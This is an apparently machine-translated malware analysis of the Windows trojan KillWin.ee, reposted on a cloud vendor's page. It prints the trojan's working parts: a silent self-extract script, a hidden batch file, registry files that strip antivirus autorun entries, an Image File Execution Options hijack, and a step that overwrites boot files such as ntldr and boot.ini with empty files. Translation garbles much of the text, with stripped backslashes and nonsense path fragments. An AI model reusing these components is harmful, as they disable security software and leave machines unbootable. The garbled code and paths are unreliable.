Analyze and clear Trojan. Win32.KillWin. ee Virus

Source: Internet
Author: User

Today, with the ever-changing nature of the virus, more and more camouflage and new variants are crazy one day after another. In the face of such a situation, many netizens can only restore or reinstall the system once and again. Security Software seems to be powerless at this time, because many virus and Trojan horses began to remove the security protection function before the attack, this is not the new Trojan. Win32.KillWin. ee also has this function.

Virus analysis
The virus is named Trojan. Win32.KillWin. ee. Although the file is only 169 KB (173,614 bytes), its power cannot be underestimated. The virus is in WINRAR decompressed package format. You can modify its icon to the ID of the card assistant to disguise itself. Program.

The program uses the automatic decompression command to decompress itself and then begins to cause system damage. The self-extracting command is as follows:
Path = % SystemRoot % system32
SavePath
Setupappshidemo-.exe kv. bat
Silent = 1
Overwrite = 1

Execute hidecmd.exe (hide execution BAT) and call kv. bat to hide the execution.
The content of kv. bat is:
@ Echo off
% SystemRoot % egedit/s kaka. reg
% SystemRoot % egedit/s gameover. reg
Exit
Virus modify registry
After the preceding command is completed, the virus source begins to be imported to two REG files in the system to modify the registry. The contents are as follows:
Kaka. reg:
Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce]
"KKDelay" = "C: \ Program Files \ Rising \ AntiSpyware \ RunOnce.exe"

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Runeip" = "" C: \ Program Files \ Rising \ AntiSpyware \ runiep.exe "/startup"

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponents]

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsIMAIL]
"Installed" = "1"

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMAPI]
"Installed" = "1"
"NoChange" = "1"

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOptionalComponentsMSFS]
"Installed" = "1"


Virus deletion card Assistant
At this time, the virus has not stopped. It starts to search for and delete the startup of the card assistant. The content is as follows:
Gameover. reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRas.exe]
"Debugger" = "C: \ winnt \ system32 \ gameover.exe"
In this way, the main program of Kaka is hijacked and pointed to the released virus.

TIPS: Here % SystemRoot % system32 can be seen that the author is targeting the WIN2K series, because the WINRAR release script just now uses environment variables, and only the WINNT folder is available on the WIN2K series operating platform, in XP, WINDOWSsystem32 is used. Therefore, this hijacking point is invalid.

Important Notes
% System32 % is a variable path. The virus queries the operating System to determine the location of the current System folder. In Windows2000/NT, the default installation path is C: WinntSystem32, and in windows95/98/me, the default installation path is C: WindowsSystem. In windowsXP, the default installation path is C: WindowsSystem32.
% Temp % = C: Documents and SettingsAAAAALocal SettingsTemp current user TEMP cache variable
% Windir % mongodws directory
% DriveLetter % logical drive root directory
% ProgramFiles % default system program installation directory
% HomeDrive % = C: partition of the currently started System
% Documents and Settings % root directory of the current user document

Damage the system's gameover.exe
After the virus is stuck, it starts to take the next step to destroy the system by releasing the gameover.exe program in the system. The actual gameover.exe is also a self-decompressed package. The command containing the self-decompressed script is as follows:
Path = C:
SavePath
Silent = 1
Overwrite = 1
0-byte Empty files with the same name are released to replace the following system files and disrupt system startup:
AUTOEXEC. BAT
Boot. ini
Bootfont. bin
CONFIG. SYS
IO. SYS
MSDOS. SYS
NTDETECT. COM
Ntldr

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.